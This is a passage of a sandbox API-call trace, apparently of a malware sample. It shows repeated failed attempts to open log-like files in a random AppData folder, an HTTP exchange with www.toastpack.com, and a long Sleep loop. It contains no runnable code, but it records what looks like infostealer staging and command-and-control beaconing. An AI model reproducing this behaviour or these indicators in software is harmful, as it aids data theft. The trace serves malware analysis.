HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0209.801] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0xa0f7860) returned 1 [0209.801] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrm.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrm.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0209.801] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrm.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logrm.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0209.801] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0209.801] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0xa0f7860) returned 1 [0209.801] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrv.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrv.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0209.801] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrv.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logrv.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0209.805] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0209.805] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0xa0f7860) returned 1 [0209.806] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logro.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logro.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0209.806] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logro.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logro.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0209.806] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0209.806] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0xa0f7860) returned 1 [0209.806] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logcl.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logcl.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0209.806] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logcl.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logcl.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0209.806] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0209.806] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0xa0f7860) returned 1 [0209.806] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logim.jpeg", NtPathName=0x1302fab0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logim.jpeg", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0209.806] NtCreateFile (in: FileHandle=0x1302fa50, DesiredAccess=0x120089, ObjectAttributes=0x1302fac0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logim.jpeg" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logim.jpeg"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa60, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa50*=0xffffffffffffffff, IoStatusBlock=0x1302fa60*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0209.806] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302f9d0 | out: HeapArray=0x1302f9d0*=0x5c0000) returned 0x6 [0209.806] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0xa0f7860) returned 1 [0209.806] socket (af=2, type=1, protocol=6) returned 0x2034 [0209.807] getaddrinfo (in: pNodeName="www.toastpack.com", pServiceName="80", pHints=0x9e755f8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x9e75628 | out: ppResult=0x9e75628*=0xa05e150*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=0, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x9f92d70*(sa_family=2, sin_port=0x50, sin_addr="34.102.136.180"), ai_next=0x0)) returned 0 [0209.831] connect (s=0x2034, name=0x9f92d70*(sa_family=2, sin_port=0x50, sin_addr="34.102.136.180"), namelen=16) returned 0 [0209.850] send (s=0x2034, buf=0x82e10fa*, len=171, flags=0) returned 171 [0209.850] setsockopt (s=0x2034, level=65535, optname=4102, optval="ô\x01", optlen=4) returned 0 [0209.850] recv (in: s=0x2034, buf=0x127cf040, len=2048000, flags=0 | out: buf=0x127cf040*) returned 477 [0209.996] closesocket (s=0x2034) returned 0 [0209.997] Sleep (dwMilliseconds=0x7d0) [0210.003] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7log00.ini", NtPathName=0x1302fb20, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7log00.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0210.003] NtCreateFile (in: FileHandle=0x1302fac0, DesiredAccess=0x120089, ObjectAttributes=0x1302fb30*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7log00.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7log00.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fad0, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fac0*=0xffffffffffffffff, IoStatusBlock=0x1302fad0*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0210.003] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa40 | out: HeapArray=0x1302fa40*=0x5c0000) returned 0x6 [0210.003] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0xa0f7860) returned 1 [0210.003] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logri.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logri.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0210.003] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logri.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logri.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0210.004] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0210.004] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0xa0f7860) returned 1 [0210.004] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrf.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrf.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0210.004] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrf.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logrf.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0210.004] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0210.004] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0xa0f7860) returned 1 [0210.004] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrt.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrt.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0210.004] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrt.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logrt.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0210.004] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0210.004] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0xa0f7860) returned 1 [0210.004] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrg.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrg.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0210.004] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrg.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logrg.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0210.004] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0210.004] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0xa0f7860) returned 1 [0210.004] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0210.004] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrc.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logrc.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0210.005] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0210.005] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0xa0f7860) returned 1 [0210.005] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrm.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrm.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0210.005] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrm.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logrm.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0210.005] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0210.005] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0xa0f7860) returned 1 [0210.005] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrv.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrv.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0210.005] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logrv.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logrv.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0210.005] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0210.005] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0xa0f7860) returned 1 [0210.005] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logro.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logro.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0210.005] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logro.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logro.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0210.005] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0210.005] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0xa0f7860) returned 1 [0210.006] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logcl.ini", NtPathName=0x1302fae0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logcl.ini", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0210.006] NtCreateFile (in: FileHandle=0x1302fa80, DesiredAccess=0x120089, ObjectAttributes=0x1302faf0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logcl.ini" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logcl.ini"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa90, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa80*=0xffffffffffffffff, IoStatusBlock=0x1302fa90*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0210.006] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302fa00 | out: HeapArray=0x1302fa00*=0x5c0000) returned 0x6 [0210.006] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0xa0f7860) returned 1 [0210.006] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logim.jpeg", NtPathName=0x1302fab0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logim.jpeg", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0210.006] NtCreateFile (in: FileHandle=0x1302fa50, DesiredAccess=0x120089, ObjectAttributes=0x1302fac0*(Length=0x30, RootDirectory=0x0, ObjectName="\\??\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\5M764PD8\\5M7logim.jpeg" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\roaming\\5m764pd8\\5m7logim.jpeg"), Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x1302fa60, AllocationSize=0x0, FileAttributes=0x80, ShareAccess=0x7, CreateDisposition=0x1, CreateOptions=0x60, EaBuffer=0x0, EaLength=0x0 | out: FileHandle=0x1302fa50*=0xffffffffffffffff, IoStatusBlock=0x1302fa60*(Status=0x0, Pointer=0x0, Information=0x0)) returned 0xc000003a [0210.006] RtlGetProcessHeaps (in: HeapCount=0x2, HeapArray=0x1302f9d0 | out: HeapArray=0x1302f9d0*=0x5c0000) returned 0x6 [0210.006] RtlFreeHeap (HeapHandle=0x5c0000, Flags=0x0, BaseAddress=0xa0f7860) returned 1 [0210.007] Sleep (dwMilliseconds=0x7d0) [0210.009] Sleep (dwMilliseconds=0x7d0) [0210.010] Sleep (dwMilliseconds=0x7d0) [0210.013] Sleep (dwMilliseconds=0x7d0) [0210.014] Sleep (dwMilliseconds=0x7d0) [0210.016] Sleep (dwMilliseconds=0x7d0) [0210.017] Sleep (dwMilliseconds=0x7d0) [0210.018] Sleep (dwMilliseconds=0x7d0) [0210.020] Sleep (dwMilliseconds=0x7d0) [0210.022] Sleep (dwMilliseconds=0x7d0) [0210.024] Sleep (dwMilliseconds=0x7d0) [0210.026] Sleep (dwMilliseconds=0x7d0) [0210.027] Sleep (dwMilliseconds=0x7d0) [0210.029] Sleep (dwMilliseconds=0x7d0) [0210.030] Sleep (dwMilliseconds=0x7d0) [0210.032] Sleep (dwMilliseconds=0x7d0) [0210.033] Sleep (dwMilliseconds=0x7d0) [0210.035] Sleep (dwMilliseconds=0x7d0) [0210.036] Sleep (dwMilliseconds=0x7d0) [0210.038] Sleep (dwMilliseconds=0x7d0) [0210.040] Sleep (dwMilliseconds=0x7d0) [0210.041] Sleep (dwMilliseconds=0x7d0) [0210.042] Sleep (dwMilliseconds=0x7d0) [0210.044] Sleep (dwMilliseconds=0x7d0) [0210.047] Sleep (dwMilliseconds=0x7d0) [0210.048] Sleep (dwMilliseconds=0x7d0) [0210.050] Sleep (dwMilliseconds=0x7d0) [0210.051] Sleep (dwMilliseconds=0x7d0) [0210.053] Sleep (dwMilliseconds=0x7d0) [0210.056] Sleep (dwMilliseconds=0x7d0) [0210.058] Sleep (dwMilliseconds=0x7d0) [0210.060] Sleep (dwMilliseconds=0x7d0) [0210.061] Sleep (dwMilliseconds=0x7d0) [0210.063] Sleep (dwMilliseconds=0x7d0) [0210.064] Sleep (dwMilliseconds=0x7d0) [0210.066] Sleep (dwMilliseconds=0x7d0) [0210.068] Sleep (dwMilliseconds=0x7d0) [0210.069] Sleep (dwMilliseconds=0x7d0) [0210.071] Sleep (dwMilliseconds=0x7d0) [0210.073] Sleep (dwMilliseconds=0x7d0) [0210.074] Sleep (dwMilliseconds=0x7d0) [0210.075] Sleep (dwMilliseconds=0x7d0) [0210.077] Sleep (dwMilliseconds=0x7d0) [0210.078] Sleep (dwMilliseconds=0x7d0) [0210.080] Sleep (dwMilliseconds=0x7d0) [0210.081] Sleep (dwMilliseconds=0x7d0) [0210.083] Sleep (dwMilliseconds=0x7d0) [0210.084] Sleep (dwMilliseconds=0x7d0) [0210.086] Sleep (dwMilliseconds=0x7d0) [0210.088] Sleep (dwMilliseconds=0x7d0) [0210.090] Sleep (dwMilliseconds=0x7d0) [0210.092] Sleep (dwMilliseconds=0x7d0) [0210.093] Sleep (dwMilliseconds=0x7d0) [0210.095] Sleep (dwMilliseconds=0x7d0) [0210.096] Sleep (dwMilliseconds=0x7d0) [0210.097] Sleep (dwMilliseconds=0x7d0) [0210.101] Sleep (dwMilliseconds=0x7d0) [0210.103] Sleep (dwMilliseconds=0x7d0) [0210.104] Sleep (dwMilliseconds=0x7d0) [0210.105] Sleep (dwMilliseconds=0x7d0) [0210.107] Sleep (dwMilliseconds=0x7d0) [0210.108] Sleep (dwMilliseconds=0x7d0) [0210.110] Sleep (dwMilliseconds=0x7d0) [0210.111] Sleep (dwMilliseconds=0x7d0) [0210.113] Sleep (dwMilliseconds=0x7d0) [0210.114] Sleep (dwMilliseconds=0x7d0) [0210.116] Sleep (dwMilliseconds=0x7d0) [0210.117] Sleep (dwMilliseconds=0x7d0) [0210.119] Sleep (dwMilliseconds=0x7d0) [0210.121] Sleep (dwMilliseconds=0x7d0) [0210.123] Sleep (dwMilliseconds=0x7d0) [0210.124] Sleep (dwMilliseconds=0x7d0) [0210.125] Sleep (dwMilliseconds=0x7d0) [0210.127] Sleep (dwMilliseconds=0x7d0) [0210.128] Sleep (dwMilliseconds=0x7d0) [0210.131] Sleep (dwMilliseconds=0x7d0) [0210.134] Sleep (dwMilliseconds=0x7d0) [0210.136] Sleep (dwMilliseconds=0x7d0) [0210.139] Sleep (dwMilliseconds=0x7d0) [0210.140] Sleep (dwMilliseconds=0x7d0) [0210.142] Sleep (dwMilliseconds=0x7d0) [0210.145] Sleep (dwMilliseconds=0x7d0) [0210.146] Sleep (dwMilliseconds=0x7d0) 